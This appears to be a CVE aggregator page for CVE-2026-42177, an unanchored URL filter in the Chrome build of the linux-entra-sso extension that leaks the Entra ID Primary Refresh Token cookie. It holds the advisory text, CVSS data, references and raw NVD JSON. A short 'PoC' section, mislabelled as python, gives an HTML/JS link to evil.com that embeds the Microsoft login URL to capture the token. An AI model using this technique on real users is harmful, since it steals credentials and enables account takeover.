CVE-2026-42177

Description

linux-entra-sso is a browser plugin for Linux to SSO on Microsoft Entra ID. Prior to 1.8.1, platform/chrome/js/platform-chrome.js:69-88 registers a single declarativeNetRequest rule whose urlFilter is Platform.SSO_URL + "/*", i.e. "https://login.microsoftonline.com/*". Chrome's urlFilter without a | or || anchor is substring-matched against the full request URL. The same applied rule action is modifyHeaders that attaches the Entra ID Primary Refresh Token cookie. The Firefox adapter in platform/firefox/js/platform-firefox.js:53 performs a belt-and-braces startsWith(Platform.SSO_URL) check before injecting the header; the Chrome adapter does not. When the extension holds broad host permissions through the optional_host_permissions: ["https://*/*"] declared in platform/chrome/manifest.json:34, a main-frame navigation to a URL whose path embeds https://login.microsoftonline.com/ causes Chrome to attach the PRT cookie to the request to the attacker-controlled host. This vulnerability is fixed in 1.8.1.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

linux-entra-sso < 1.8.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- PoC Concept: Attacker sets up a page to trigger the leak -->
<!-- This is a simulation of the attack vector -->

<script>
// The attacker crafts a URL where the path contains the target string
const maliciousUrl = "https://evil.com/redirect_to/https://login.microsoftonline.com/";

// When the victim navigates to this URL (e.g., via a link),
// the vulnerable extension detects the substring match.
// The extension then appends the PRT cookie to the request sent to evil.com.

console.log("Simulating navigation to: " + maliciousUrl);
// In a real scenario, window.location.href = maliciousUrl;
</script>

<!-- HTML Body -->
<h1>CVE-2026-42177 PoC Simulation</h1>
<p>Click <a href="https://evil.com/xyz/https://login.microsoftonline.com/">here</a> to trigger PRT leak if vulnerable extension is installed.</p>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-42177
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-42177
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-42177/
[4] VulDB https://vuldb.com/cve/CVE-2026-42177
[5] https://github.com/siemens/linux-entra-sso/security/advisories/GHSA-52rj-42vh-2rxc
[6] https://github.com/siemens/linux-entra-sso/security/advisories/GHSA-52rj-42vh-2rxc

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-42177", "sourceIdentifier": "[email protected]", "published": "2026-05-12T18:17:24.240", "lastModified": "2026-05-13T16:31:18.790", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "linux-entra-sso is a browser plugin for Linux to SSO on Microsoft Entra ID. Prior to 1.8.1, platform/chrome/js/platform-chrome.js:69-88 registers a single declarativeNetRequest rule whose urlFilter is Platform.SSO_URL + \"/*\", i.e. \"https://login.microsoftonline.com/*\". Chrome's urlFilter without a | or || anchor is substring-matched against the full request URL. The same applied rule action is modifyHeaders that attaches the Entra ID Primary Refresh Token cookie. The Firefox adapter in platform/firefox/js/platform-firefox.js:53 performs a belt-and-braces startsWith(Platform.SSO_URL) check before injecting the header; the Chrome adapter does not. When the extension holds broad host permissions through the optional_host_permissions: [\"https://*/*\"] declared in platform/chrome/manifest.json:34, a main-frame navigation to a URL whose path embeds https://login.microsoftonline.com/ causes Chrome to attach the PRT cookie to the request to the attacker-controlled host. This vulnerability is fixed in 1.8.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-436"}]}], "references": [{"url": "https://github.com/siemens/linux-entra-sso/security/advisories/GHSA-52rj-42vh-2rxc", "source": "[email protected]"}, {"url": "https://github.com/siemens/linux-entra-sso/security/advisories/GHSA-52rj-42vh-2rxc", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}